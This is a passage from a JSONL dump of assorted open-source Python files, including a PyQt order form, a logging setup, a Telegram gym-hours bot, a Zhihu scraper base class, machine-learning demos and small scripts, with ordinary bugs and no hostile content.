not c_id:\n return\n sql = f'''select fNUIT,fCity,fContato,fAreaCode,\n fCelular,fTelefone,fEndereco,fEmail,\n fWeb,fFax,fNote ,fTaxRegCer\n from t_customer \n where fCustomerID={c_id}'''\n dic = JPDb().getDict(sql)[0]\n if self.isNewMode:\n self.ui.fCelular.refreshValueNotRaiseEvent(dic['fCelular'], True)\n self.ui.fContato.refreshValueNotRaiseEvent(dic['fContato'], True)\n self.ui.fTelefone.refreshValueNotRaiseEvent(dic['fTelefone'], True)\n self.ui.fNUIT.setText(dic['fNUIT'])\n self.ui.fCity.setText(dic['fCity'])\n self.ui.fEndereco.setText(dic['fEndereco'])\n self.ui.fEmail.setText(dic['fEmail'])\n\n def onGetColumnFormulas(self):\n fla = \"JPRound(JPRound({3}) * JPRound({4},3),3)\"\n return [(5, fla)]\n\n def __onTaxKeyPress(self, KeyEvent):\n if (KeyEvent.modifiers() == Qt.AltModifier\n and KeyEvent.key() == Qt.Key_Delete):\n self.cacuTax = False\n self.ObjectDict()['fTax'].refreshValueRaiseEvent(None, True)\n elif (KeyEvent.modifiers() == Qt.AltModifier\n and KeyEvent.key() == Qt.Key_T):\n self.cacuTax = True\n self.ObjectDict()['fTax'].refreshValueRaiseEvent(None, True)\n\n def onGetHiddenColumns(self):\n return [1]\n\n def onGetReadOnlyColumns(self):\n return [2, 5]\n\n def onGetColumnWidths(self):\n return [25, 0, 500, 100, 100, 100]\n\n def onGetFieldsRowSources(self):\n pub = JPPub()\n u_lst = [[item[1], item[0]] for item in JPUser().getAllUserList()]\n return [('fCustomerID', pub.getCustomerList(), 1),\n ('fVendedorID', pub.getEnumList(10), 1),\n ('fEntryID', u_lst, 1)]\n\n def onGetReadOnlyFields(self):\n return [\"fEntryID\", 'fAmount', 'fPayable', 'fTax', 'fEmail']\n\n def onGetDisableFields(self):\n return ['fOrderID', 'fCity', 'fNUIT', \"fEntryID\", 'fEndereco']\n\n def onDateChangeEvent(self, obj, value):\n\n if not isinstance(obj, QModelIndex):\n if obj.objectName() == \"fCustomerID\":\n if self.ui.fCustomerID.currentIndex() != -1:\n self.__customerIDChanged()\n return\n\n fAmount = None\n temp_fDesconto = self.ui.fDesconto.Value()\n fDesconto = temp_fDesconto if temp_fDesconto else 0\n fAmount = self.getColumnSum(5)\n if fAmount is None:\n self.ui.fAmount.refreshValueNotRaiseEvent(None, True)\n self.ui.fTax.refreshValueNotRaiseEvent(None, True)\n self.ui.fPayable.refreshValueNotRaiseEvent(None, True)\n return\n else:\n 
self.ui.fAmount.refreshValueNotRaiseEvent(fAmount, True)\n\n fTax = 0.0\n if self.cacuTax:\n fTax = JPRound((fAmount - fDesconto) * 0.17, 2)\n self.ui.fTax.refreshValueNotRaiseEvent(fTax, True)\n else:\n fTax = self.ui.fTax.Value()\n\n fPayable = fAmount + fTax - fDesconto\n self.ui.fPayable.refreshValueNotRaiseEvent(fPayable, True)\n\n def onAfterSaveData(self, data):\n act = 'new' if self.isNewMode else 'edit'\n JPPub().broadcastMessage(tablename=\"t_product_outbound_order\",\n action=act,\n PK=data)\n if self.isNewMode:\n self.ui.fOrderID.refreshValueNotRaiseEvent(data, True)\n\n def afterSetDataBeforeInsterRowEvent(self, row_data, Index):\n # 用于判断可否有加行\n if row_data is None:\n return False\n if row_data[5] is None:\n return False\n return True\n # data = row_data\n # if data[7] == 0:\n # return False\n # lt = [data[2], data[4], data[5], data[6], data[7]]\n # lt = [float(str(i)) if i else 0 for i in lt]\n # return int(lt[4] * 100) == int(\n # reduce(lambda x, y: x * y, lt[0:4]) * 100)\n\n @pyqtSlot()\n def on_butPrint_clicked(self):\n try:\n rpt = Outbound_Order_Report()\n rpt.getFullProductName = self.getFullProductName\n rpt.BeginPrint(self.ui.fOrderID.Value())\n except Exception as identifier:\n msg = \"打印过程出错,错误信息为:{}\".format(str(identifier))\n QMessageBox.warning(self, '提示', msg, QMessageBox.Ok,\n QMessageBox.Ok)\n\n @pyqtSlot()\n def on_butSave_clicked(self):\n try:\n lst = self.getSqls(self.PKRole)\n isOK, result = JPDb().executeTransaction(lst)\n if isOK:\n self.onAfterSaveData(result)\n try:\n self.ui.butSave.setEnabled(False)\n self.ui.butPrint.setEnabled(True)\n self.ui.butPDF.setEnabled(True)\n except Exception as e:\n print(str(e))\n self.afterSaveData.emit(result)\n QMessageBox.information(self, '完成',\n '保存数据完成!\\nSave data complete!')\n except Exception as e:\n msgBox = QMessageBox(QMessageBox.Critical, u'提示', str(e))\n msgBox.exec_()\n","sub_path":"lib/ZionWidgets/OutboundOrder.py","file_name":"OutboundOrder.py","file_ext":"py","file_size_in_byte":17995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"495327554","text":"\"\"\"Project configuration, particularly for logging.\n\nProject-scope constants may reside here, but more importantly, some setup here\nwill provide a logging infrastructure for all of the project's modules.\nIndividual modules and classes may provide separate configuration on a more\nlocal level, but this will at least provide a foundation.\n\n\"\"\"\n\nimport logging\nimport os\nfrom sys import stdout\n\nfrom ._version import __version__\nfrom .attribute_dict import AttributeDict\nfrom .const import *\nfrom .exceptions import PeppyError\nfrom .project import Project, ProjectContext\nfrom .sample import Sample, Subsample\n\n\n__classes__ = [\"AttributeDict\", \"Project\", \"Sample\"]\n__all__ = __classes__ + [\"PeppyError\"]\n\n\nLOGGING_LEVEL = \"INFO\"\nLOGGING_LOCATIONS = (stdout, )\n\n# Default user logging format is simple\nDEFAULT_LOGGING_FMT = \"%(message)s\"\n# Developer logger format is more information-rich\nDEV_LOGGING_FMT = \"%(module)s:%(lineno)d (%(funcName)s) [%(levelname)s] > %(message)s \"\n\n\n# Ensure that we have a handler and don't get a logging exception.\n# Note that this was originally with looper.models.\n_LOGGER = logging.getLogger(__name__)\nif not logging.getLogger().handlers:\n _LOGGER.addHandler(logging.NullHandler())\n\n\n\ndef setup_peppy_logger(level, additional_locations=None, devmode=False):\n \"\"\"\n Establish a project logger.\n\n This configures a logger to 
provide information about pep models.\n Verbosity, destination(s) for messages, and message text format are\n controlled by the arguments' values. This is also used by the test suite.\n\n :param int | str level: logging level\n :param tuple(str | FileIO[str]) additional_locations: supplementary\n destination(s) to which to ship logs\n :param bool devmode: whether to use developer logging config\n :return logging.Logger: project-root logger\n \"\"\"\n\n logging.addLevelName(5, \"VERY_FINE\")\n\n fmt = DEV_LOGGING_FMT if devmode else DEFAULT_LOGGING_FMT\n\n # Establish the logger.\n LOOPER_LOGGER = logging.getLogger(\"peppy\")\n # First remove any previously-added handlers\n LOOPER_LOGGER.handlers = []\n LOOPER_LOGGER.propagate = False\n\n # Handle int- or text-specific logging level.\n try:\n level = int(level)\n except ValueError:\n level = level.upper()\n\n try:\n LOOPER_LOGGER.setLevel(level)\n except Exception:\n logging.error(\"Can't set logging level to %s; instead using: '%s'\",\n str(level), str(LOGGING_LEVEL))\n level = LOGGING_LEVEL\n LOOPER_LOGGER.setLevel(level)\n\n # Process any additional locations.\n locations_exception = None\n where = LOGGING_LOCATIONS\n if additional_locations:\n if isinstance(additional_locations, str):\n additional_locations = (additional_locations, )\n try:\n where = LOGGING_LOCATIONS + tuple(additional_locations)\n except TypeError as e:\n locations_exception = e\n if locations_exception:\n logging.warn(\"Could not interpret {} as supplementary root logger \"\n \"target destinations; using {} as root logger location(s)\".\n format(additional_locations, LOGGING_LOCATIONS))\n\n # Add the handlers.\n formatter = logging.Formatter(fmt=(fmt or DEFAULT_LOGGING_FMT))\n for loc in where:\n if isinstance(loc, str):\n # File destination\n dirpath = os.path.abspath(os.path.dirname(loc))\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n handler_type = logging.FileHandler\n elif hasattr(loc, \"write\"):\n # Stream destination\n handler_type = logging.StreamHandler\n else:\n # Strange supplementary destination\n logging.info(\"{} as logs destination appears to be neither \"\n \"a filepath nor a stream.\".format(loc))\n continue\n\n if handler_type is logging.FileHandler:\n handler = handler_type(loc, mode='w')\n else:\n handler = handler_type(loc)\n\n handler.setLevel(level)\n handler.setFormatter(formatter)\n LOOPER_LOGGER.addHandler(handler)\n\n return LOOPER_LOGGER\n","sub_path":"peppy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"148260012","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import metrics\n\ndf = pd.read_csv('USA_Housing.csv')\n\nprint(df.info())\nprint(df.columns)\n\nsns.pairplot(df)\nplt.show()\nsns.heatmap(df.corr())\nplt.show()\nx = df[['Avg. Area Income', 'Avg. Area House Age', 'Avg. Area Number of Rooms',\n 'Avg. 
Area Number of Bedrooms', 'Area Population']]\nprint(x)\ny = df['Price']\n\n\n#Divide o x e o y para criar os DF de treinamento e de teste.\n#O tamaanho dos df é de acordo com o test_size\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.4, random_state=101)\nprint(x_train.shape[0])\nprint(x_test.shape[0])\n\nlm = LinearRegression()\nlm.fit(x_train, y_train)\n#Inicio da reta no Y\nprint(lm.intercept_)\n#Coeficientes\nprint(lm.coef_)\n\ncoefs = pd.DataFrame(lm.coef_, x.columns, ['Coefs'])\nprint(coefs)\n\npredict = lm.predict(x_test)\n#Valor real pelo valor previsto\nplt.figure(figsize=(14,7))\nplt.scatter(x=y_test, y=predict)\nplt.show()\n#Printa o erro\nsns.distplot(y_test-predict)\nplt.show()\n\n\n#Erros\nprint(\"MAE\", metrics.mean_absolute_error(y_test, predict))\nprint(\"MSE\", metrics.mean_squared_error(y_test, predict))\nprint(\"RMSE\", np.sqrt(metrics.mean_squared_error(y_test, predict)))\n","sub_path":"regressao_linear/regressao_linear.py","file_name":"regressao_linear.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"193467403","text":"import argparse\nimport requests\nimport json\nimport time\nimport datetime\nimport telepot\nimport numpy as np \nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom telepot.loop import MessageLoop\n\n\nTOKEN = None\n\nclass ZenitBot:\n '''\n this bot finds the opening hours of the zenit gym and posts them into a chat if asked to\n if added to a chat, print /info to get functions\n\n __init__() - \n get_week_changes() - \n get_todays_time() - \n get_week_time() - \n get_info() - \n handle() - \n '''\n\n def __init__(self):\n '''\n initialize telegram bot\n '''\n\n self.bot = telepot.Bot(TOKEN)\n self.dt = pd.read_json('/home/hanzule/zenit/default_times.json') # load default opening hours\n MessageLoop(self.bot, self.handle).run_as_thread()\n\n\n def get_week_changes(self):\n '''\n parse zenit home page for updates in opening times for the current week\n create pandas dataframe and compare it with the default times\n if there are differences, print them \n if not, print just the no differences message\n '''\n\n # parse zenit web page\n info = requests.get('https://www.zenit-klettern.de/')\n soup = BeautifulSoup(info.text, 'html.parser')\n\n block = soup.find('div', {'id': 'c23'})\n hours = block.find_all('td')\n element = []\n for s in hours:\n element.append(s.text)\n\n # create dataframe and compare\n self.ct = pd.DataFrame([element[7:14], element[14:]], columns=element[:7])\n rows, cols = np.where((self.dt.values == self.ct.values) == False)\n\n if len(cols) > 0:\n # find changed times if there are differences\n response = ''\n for i in range(len(cols)):\n col = int(cols[i])\n row = int(rows[i])\n day = self.ct.keys()[col]\n new_time = self.ct.values[row,col]\n old_time = self.dt.values[row,col]\n\n if row == 0:\n string = 'öffnet'\n else:\n string = 'schließt'\n\n response = response + 'Die Halle {} diese Woche am {} um {} Uhr.\\n'.format(string,day,new_time)\n\n else:\n # write default text if there are no differences\n response = 'Die Öffnungszeiten in dieser Woche sind bisher unverändert.'\n\n return response\n\n\n def get_todays_time(self):\n ''' \n returns the opening hours for today\n '''\n\n today = datetime.datetime.today().weekday()\n\n # parse zenit web page\n info = requests.get('https://www.zenit-klettern.de/')\n soup = BeautifulSoup(info.text, 'html.parser')\n\n block = soup.find('div', {'id': 'c23'})\n hours = 
block.find_all('td')\n element = []\n for s in hours:\n element.append(s.text)\n\n # create dataframe \n self.ct = pd.DataFrame([element[7:14], element[14:]], columns=element[:7])\n\n times = self.ct[self.ct.columns[today]].values\n response = 'Die Halle öffnet heute um {} Uhr und schließt um {} Uhr.'.format(times[0], times[1])\n\n # check if opening hours are regular toady\n if (self.ct[self.ct.columns[today]].values == self.dt[self.dt.columns[today]].values).all():\n response = response + ' Die Öffnungszeiten sind heute regulär.'\n else:\n response = response + ' Die Öffnungszeiten für heute sind verändert.'\n\n return response\n\n\n def get_week_time(self):\n ''' \n returns the opening hours for this week\n '''\n\n # parse zenit web page\n info = requests.get('https://www.zenit-klettern.de/')\n soup = BeautifulSoup(info.text, 'html.parser')\n\n block = soup.find('div', {'id': 'c23'})\n hours = block.find_all('td')\n element = []\n for s in hours:\n element.append(s.text)\n\n # create dataframe \n self.ct = pd.DataFrame([element[7:14], element[14:]], columns=element[:7])\n\n response = 'Die Öffnungszeiten für diese Woche sind: \\n'\n for column in self.ct:\n response = response + column + ': ' + str(self.ct[column].values[0]) + ' - ' + str(self.ct[column].values[1]) + '\\n'\n\n return response\n\n\n def get_info(self):\n '''\n sends info text to chat\n should contain all or the most important functions\n '''\n\n response = 'Ich bin ein Bot und kann euch über die Öffnungszeiten der Kletterhalle informieren. Wenn Ihr was wissen wollt, fragt einfach:\\n\\\n /heute - gibt euch die heutigen Öffnungszeiten\\n\\\n /woche - gibt euch die Öffnungszeiten für diese Woche\\n\\\n /anders - gibt euch alle Veränderunge für diese Woche\\n\\\n mehr kommt noch...'\n\n return response\n\n\n\n def handle(self, msg):\n ''' \n handle commands given to bot\n '''\n \n chat_id = msg['chat']['id']\n command = msg['text']\n\n if command == '/anders':\n # send changes in opening times to chat\n message = self.get_week_changes()\n print(message)\n self.bot.sendMessage(chat_id, message)\n\n elif command == '/heute':\n # send todays opening times to chat\n message = self.get_todays_time()\n print(message)\n self.bot.sendMessage(chat_id, message)\n\n elif command == '/woche':\n # send todays opening times to chat\n message = self.get_week_time()\n print(message)\n self.bot.sendMessage(chat_id, message)\n\n elif command == '/info':\n # implement helper command\n message = self.get_info()\n print(message)\n self.bot.sendMessage(chat_id, message)\n\n elif command == '/echo':\n # print chat_id so that bot can post into group chats\n print(chat_id)\n \n\n\n\nif __name__ == '__main__':\n #ArgumentParser\n parser = argparse.ArgumentParser(description='Telegram Bot TOKEN:')\n parser.add_argument('-tk','--Token', help='gimme the token', type=str)\n args = vars(parser.parse_args())\n\n TOKEN = args['Token']\n\n zb = ZenitBot()\n print (\"Let's go...\")\n while 1:\n time.sleep(10)\n\n\n\n","sub_path":"zenit_bot.py","file_name":"zenit_bot.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"96844828","text":"#! 
python3\r\n# -*- coding: utf-8 -*-\r\n# @Author: Drake-Z\r\n# @Date: 2017-09-26 10:47:42\r\n# @Last Modified time: 2017-10-29 10:32:39\r\n\r\nimport json\r\nimport random\r\nimport requests\r\nimport logging\r\nfrom retrying import retry\r\nfrom datetime import datetime\r\n\r\nfrom ZhihuAPI import URL\r\nfrom ZhihuAPI import ZhihuError\r\nfrom ZhihuAPI import settings\r\n\r\n\r\nclass Model(requests.Session):\r\n \"\"\"\r\n 获取知乎数据对象的抽象既基类,任何对象都可以继承该类\r\n \"\"\"\r\n\r\n def __init__(self, debug=0):\r\n super(Model, self).__init__()\r\n requests.packages.urllib3.disable_warnings()\r\n self.logger = self.create_logger(debug)\r\n self.headers = settings.HEADERS\r\n\r\n def create_logger(self, debug):\r\n logging.basicConfig(format=\"[%(filename)s line:%(lineno)d %(asctime)s] %(message)s\",\r\n datefmt=\"%H:%M:%S\",)\r\n logger = logging.getLogger(__name__)\r\n level = [logging.INFO, logging.DEBUG][debug]\r\n logger.setLevel(level)\r\n return logger\r\n\r\n @retry(stop_max_attempt_number=3, wait_fixed=3)\r\n def _request(self, method=\"post\", url=None, params=None, data=None, **kwargs):\r\n \"\"\"\r\n 通用请求方法\r\n :param method: 请求方法\r\n :param url: 请求URL\r\n :param params: 请求参数\r\n :param data: 请求数据\r\n :param kwargs: requests支持的参数,比如可以设置代理参数\r\n :return: response\r\n \"\"\"\r\n r = getattr(self, method)(url, data=data, params=params, timeout=40, **kwargs)\r\n return r\r\n\r\n @classmethod\r\n def save_file(cls, filepath, mode=\"w\", content=None, **kwargs):\r\n \"\"\"\r\n 通用保存文件方法\r\n :param filepath: 保存文件路径名\r\n :param mode: 保存模式\r\n :param content: 保存内容\r\n \"\"\"\r\n with open(filepath, mode, **kwargs) as file:\r\n file.write(content)\r\n\r\n @classmethod\r\n def get_content(cls, response):\r\n \"\"\"\r\n 通用返回 response 中的 text 方法\r\n :param response: 请求 response\r\n :return: response.text\r\n \"\"\"\r\n if response.text[0] == \"{\":\r\n return json.dumps(response.json(), indent=4, sort_keys=True, ensure_ascii=False)\r\n else:\r\n return response.content.decode('utf-8')\r\n\r\n @classmethod\r\n def get_cur_info(cls):\r\n \"\"\"\r\n 通用返回代码执行处所在文件、函数、行号方法\r\n http://www.cnblogs.com/qq78292959/archive/2013/08/29/3289658.html\r\n :type return: dict\r\n :return: func_info\r\n \"\"\"\r\n import sys\r\n try:\r\n raise Exception\r\n except:\r\n func = sys.exc_info()[2].tb_frame.f_back\r\n func_info = {\"filepath\": func.f_code.co_filename,\r\n \"func_name\": func.f_code.co_name,\r\n \"row\": func.f_lineno\r\n }\r\n return func_info\r\n\r\n @classmethod\r\n def judge_error(cls, response, data_type, condition):\r\n \"\"\"\r\n 通用判断 response 是否满足要求方法\r\n :param response: 请求 response\r\n :param data_type: response 内容应属于的类型\r\n :param condition: 判断错误的关键参数\r\n :type return: bool or dict\r\n :return: 无错误返回 False,有错误返回 err_args dict:{\"error\": Exception(……), \"data_type\": data_type, \"response\": response, \"condition\": condition}\r\n \"\"\"\r\n content = None\r\n try:\r\n assert response.ok is True\r\n if data_type == \"json\":\r\n content = response.json()\r\n else:\r\n content = response.text\r\n assert (eval(condition)) is True\r\n return False\r\n except AssertionError:\r\n if content:\r\n return ZhihuError(\"response 返回内容不符合 condition 条件\")\r\n else:\r\n return ZhihuError(\"response 状态码不正确\")\r\n except ValueError:\r\n return ZhihuError(\"response 返回类型不正确,json 解码错误\")\r\n except Exception as error:\r\n return error\r\n\r\n @classmethod\r\n def save_error(cls, func_info, err_args):\r\n \"\"\"\r\n 保存错误 response 内容\r\n :param func_info: 错误出现所在函数信息\r\n :param err_args: _judge_error 信息,需要 
response、error、data_type、condition\r\n \"\"\"\r\n time_now = str(datetime.now())[:-7]\r\n status_code = err_args[\"response\"].status_code\r\n error_type = [\"网络错误\", \"内容错误\"][status_code == requests.codes.ok]\r\n content = cls.get_content(err_args[\"response\"])\r\n\r\n error_content = (\"错误时间: {time}\\n错误类型: {error_type} - {error}\\n来源文件: {filepath}\\n\"\r\n \"来源函数: {func_name} 行号: {row}\\n当前账号: {account}\\n请求 url: {url}\\n\"\r\n \"预期数据格式: {data_type}\\n预期条件: {condition}\\n状态码: {status_code}\\n\"\r\n \"headers: {headers}\\ncookies: {cookies}\\nresponse 内容:\\n{content}\"\r\n ).format(time=time_now,\r\n error_type=error_type,\r\n error=(err_args[\"error\"].__class__.__name__ + \": \" + str(err_args[\"error\"])),\r\n filepath=func_info[\"filepath\"],\r\n func_name=func_info[\"func_name\"],\r\n account=err_args[\"account\"],\r\n url=err_args[\"url\"],\r\n headers=err_args[\"headers\"],\r\n cookies=err_args[\"cookies\"],\r\n row=func_info[\"row\"],\r\n data_type=err_args[\"data_type\"],\r\n condition=err_args[\"condition\"],\r\n status_code=status_code,\r\n content=content)\r\n charcs = \"\".join(random.sample(settings.SEED, k=8))\r\n filepath = URL.error_path(error_type=error_type, charcs=charcs)\r\n cls.save_file(filepath=filepath, content=error_content, encoding=\"utf-8\")\r\n return None\r\n","sub_path":"ZhihuAPI/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"581901568","text":"import azure.functions as func\nfrom ProcessURL.processing.article_processor import ArticleProcessor\nfrom json import dumps as jsonify\n\nimport nltk\nnltk.data.path.append('./nltk_data')\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n url = req.params.get('url')\n\n if not url:\n return func.HttpResponse(\"Please provide a valid URL.\", status_code=400)\n else:\n proc = ArticleProcessor(url)\n\n result = {\n \"authors\": proc.get_authors(),\n \"title\": proc.get_heading(),\n \"summary\": proc.get_summary(),\n \"image_url\": proc.get_image(),\n \"ws_puzzle_url\": proc.get_word_search(),\n \"vocabulary\": proc.get_keyword_definitions()\n }\n\n return func.HttpResponse(jsonify(result), mimetype=\"application/json\")","sub_path":"ProcessURL/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540331131","text":"import tensorflow as tf\n\"\"\"\n张量 在计算中如何存储\n标量 一个数字\n向量 一维数组 [1, 2, 3] 一阶张量\n矩阵 二维数组 [1, 2, 3,][1, 2, 3] 二阶张量\n\"\"\"\n\"\"\"\n张量 n维数组\n 两个属性\n 1) 张量的类型\n 2)张量的阶\n 创建张量的时候如果不指定类型\n 默认\n 整型 tf.int32\n 浮点型 tf.float32\n 创建张量的指令\n tf.constant() 创建一个常量\n tf.variable() 创建一个变量\n tf.random_normal()创建一个随机的张量\n 特殊的张量\n tf.Variable()\n tf.placeholder()\n 张量的变换\n 属性的修改\n ndarray\n 类型的修改 \n ndarray.astype(type)\n ndarray.tostring()\n 形状的修改\n ndarray.reshape(shape)\n 1)tf.cast(tensor, dtype)\n # 创建变量\n\"\"\"\ndef tensor_demo():\n \"\"\"\n 张量的演示\n \"\"\"\n tensor1 = tf.constant(2.0)\n tensor2 = tf.constant([1, 2, 3, 4], name=\"hello\")\n linera_squares = tf.constant([[1], [2], [3]], dtype=tf.int32)\n self_graph = tf.Graph()\n with self_graph.as_default():\n pass\n print(\"tensor1\", tensor1)\n print(\"tensor2\", tensor2)\n print(\"tensor3\", linera_squares)\n #类型的修改\n l_cast = tf.cast(linera_squares, dtype=tf.float32)\n print(\"linera_squares\", linera_squares)\n print(\"l_cast\", l_cast)\n return None\ndef variable_demo():\n #创建变量的演示\n #定义变量\n a = 
tf.Variable(initial_value=50)\n b = tf.Variable(initial_value=40)\n c = tf.add(a,b)\n print(\"a\", a)\n print(\"b\", b)\n print(\"c\", c)\n #修改命名空间\n with tf.variable_scope(\"hello\"):\n d = tf.Variable(name=\"var\", initial_value=50)\n print(\"d\", d)\n #初始化变量\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n a_, b_, c_ = sess.run([a, b, c])\n print(\"a_\", a_)\n print(\"b_\", b_)\n print(\"c_\", c_)\nif __name__==\"__main__\":\n # tensor_demo()\n variable_demo()","sub_path":"Tensor.py","file_name":"Tensor.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"352873547","text":"#! /usr/bin/env python3\n\nimport torch\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nimport argparse\nfrom torchvision import transforms, models, datasets\nimport argparse\nimport partspose\nimport copy\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"model\")\nparser.add_argument(\"-g\", \"--gpu\", type=int, default=0)\nparser.add_argument(\"-w\", \"--workers\", type=int, default=8)\nparser.add_argument(\"-t\", \"--total-images\", type=int)\nparser.add_argument(\"-b\", \"--batch-size\", type=int, default=32)\nparser.add_argument(\"-p\", \"--prediction-file\")\nparser.add_argument(\"testing_dir\")\nargs = parser.parse_args()\n\ntransform = transforms.Compose([\n transforms.Resize(224),\n transforms.ToTensor(),\n partspose.normalization,\n])\n\ndataset = datasets.ImageFolder(args.testing_dir, transform)\nloader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,\n shuffle=False, num_workers=args.workers)\n# image_list = [f for (f, _) in datasets.folder.make_dataset(\n# args.testing_dir, datasets.folder.find_classes(args.testing_dir)[1])]\n\nnet = torch.load(args.model)\nif args.gpu >= 0:\n net = net.cuda(args.gpu)\nnet.train(False)\nrev_classes = {c : i for i, c in enumerate(net.classes)}\nlocal_classes = list(map(float, dataset.classes))\n\ntotal_images = len(dataset) if not args.total_images else args.total_images\n\nprint(f'Evaluating model {args.model}')\n\nok = 0\nok_weak = 0\nprediction_file = (open(args.prediction_file, \"w\")\n if args.prediction_file else None)\nfor i, (inputs, labels) in enumerate(loader):\n print(f\"{i*loader.batch_size}/{len(dataset)}\", end=\"\\r\", file=sys.stderr)\n with torch.no_grad():\n if args.gpu >= 0:\n inputs = Variable(inputs.cuda(args.gpu))\n else:\n inputs = Variable(inputs)\n\n outputs = net(inputs)\n _, preds = torch.max(outputs.data, 1)\n sm = torch.nn.functional.softmax(\n Variable(outputs.data), dim=1).cpu()\n sm = [[(net.classes[j], float(sm[i,j])) for j in range(sm.shape[1])]\n for i in range(sm.shape[0])]\n for p, l, s in zip(preds.cpu(), labels.cpu(), sm):\n if net.classes[p] == local_classes[l]:\n ok += 1\n if abs(net.classes[p] - local_classes[l]) <= 15:\n ok_weak += 1\n # if prediction_file:\n # print(img, \",\".join([f\"{c[0]}:{c[1]}\" for c in s]),\n # sep=\";\", file=prediction_file)\nprint(f\"{len(dataset)}/{len(dataset)}\", file=sys.stderr)\n\nif not prediction_file:\n print(\"Strict: \", ok/total_images*100, \"%\", sep=\"\")\n print(\"Weak: \", ok_weak/total_images*100, \"%\", sep=\"\")\nelse:\n prediction_file.close()\n","sub_path":"mestrado/python/partspose/test_partspose.py","file_name":"test_partspose.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"361172973","text":"#1. Cree un programa que lea los tres ángulos internos de un triángulo y\n# muestre si los ángulos corresponden a un triángulo o no. Use funciones. Haga pruebas de escritorio. \n#Pseudocodigo\n#Variables\n# Real angulo_uno, angulo_dos, angulo_tres\n#Proceso\n#suma_angulos = angulo_uno + angulo_dos + angulo_tres\n#Si suma_angulos == 180\n#Imprimir\n#Si es un triangulo\n#Si no no es un triangulo\n\ndef calcular_triangulo(angulo_uno, angulo_dos, angulo_tres):\n triangulo = angulo_uno + angulo_dos + angulo_tres\n if triangulo == 180:\n print (\"Es un triangulo\")\n else:\n print(\"No es un triangulo\")\n\nangulo_uno = float(input(\"¿Cuál es el ángulo uno del triangulo? \"))\nif angulo_uno < 0:\n print(\"ERROR la edad no puede ser negativa\")\n exit()\nangulo_dos = float(input(\"¿Cuál es el ángulo dos del triangulo? \"))\nif angulo_dos < 0:\n print(\"ERROR la edad no puede ser negativa\")\n exit()\nangulo_tres = float(input(\"¿Cuál es el ángulo tres del triangulo? \"))\nif angulo_tres < 0:\n print(\"ERROR la edad no puede ser negativa\")\n exit()\n\ncalcular_triangulo(angulo_uno, angulo_dos, angulo_tres)\n","sub_path":"Sena/Andre/s4_1_triangulo.py","file_name":"s4_1_triangulo.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"39066405","text":"import datetime\nimport pyttsx3\nimport time\nimport sqlite3\n\n# Connection to sqlite database\nconn = sqlite3.connect(\"reminders.db\")\nc = conn.cursor()\n\nc.execute('''CREATE TABLE IF NOT EXISTS reminders\n\t\t\t (date text, reminderFor text)''')\n\n# Initializing text-to-speech engine\nengine = pyttsx3.init()\n\naddOrNot = input(\"Do you want to add a reminder? \")\nif addOrNot.lower() == \"yes\":\n\ttimeForReminder = input(\"When do you want the reminder to be? \")\n\treminderFor = input(\"What is the reminder for? 
\")\n\n\ttimeForReminder = timeForReminder.split(\"/\")\n\ttimeForReminder = [int(i) for i in timeForReminder]\n\ttimeForReminder = str(datetime.datetime(timeForReminder[2], timeForReminder[0], timeForReminder[1]).date())\n\n\t# Need to make secure and not use f string\n\tc.execute(\"INSERT INTO reminders VALUES (?, ?)\", (timeForReminder, reminderFor))\n\tconn.commit()\n\n\tengine.say(\"Reminder added\")\n\tengine.runAndWait()\n\tprint(\"Reminder added\")\n\n\tconn.close()\n\nelif addOrNot.lower() == \"no\":\n\ttoday = str(datetime.datetime.now().date())\n\n\tc.execute(\"SELECT * FROM reminders\")\n\treminders = c.fetchall()\n\n\tfor reminder in reminders:\n\t\ttime = reminder[0]\n\t\treminderFor = reminder[1]\n\t\ttime = time.split(\"-\")\n\t\ttime = datetime.datetime(int(time[0]), int(time[1]), int(time[2]))\n\n\t\tif str(time.date()) == today:\n\t\t\tprint(f\"Hey yo you have a reminder for {reminderFor}\")\n\t\t\tengine.say(f\"Hey yo you have a reminder for {reminderFor}\")\n\t\t\tengine.runAndWait()\n\n\tc.execute('''DELETE FROM reminders WHERE ?''', )\n\n\tconn.close()\n\nelse:\n\tengine.say(\"Please say yes or no.\")\n\tengine.runAndWait()\n\tprint(\"Please say yes or no.\")\n","sub_path":"reminderSystem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"558456950","text":"\"\"\"\nThis setup script allows one to build an executable app from the\ncommand line.\n\nCurrently only support Mac OSX.\n\nUsage:\n python setup.py py2app\n\"\"\"\n\nfrom setuptools import setup\nfrom os import path\nimport OMB\n\nAPP = ['OMB.py']\nDATA_FILES = 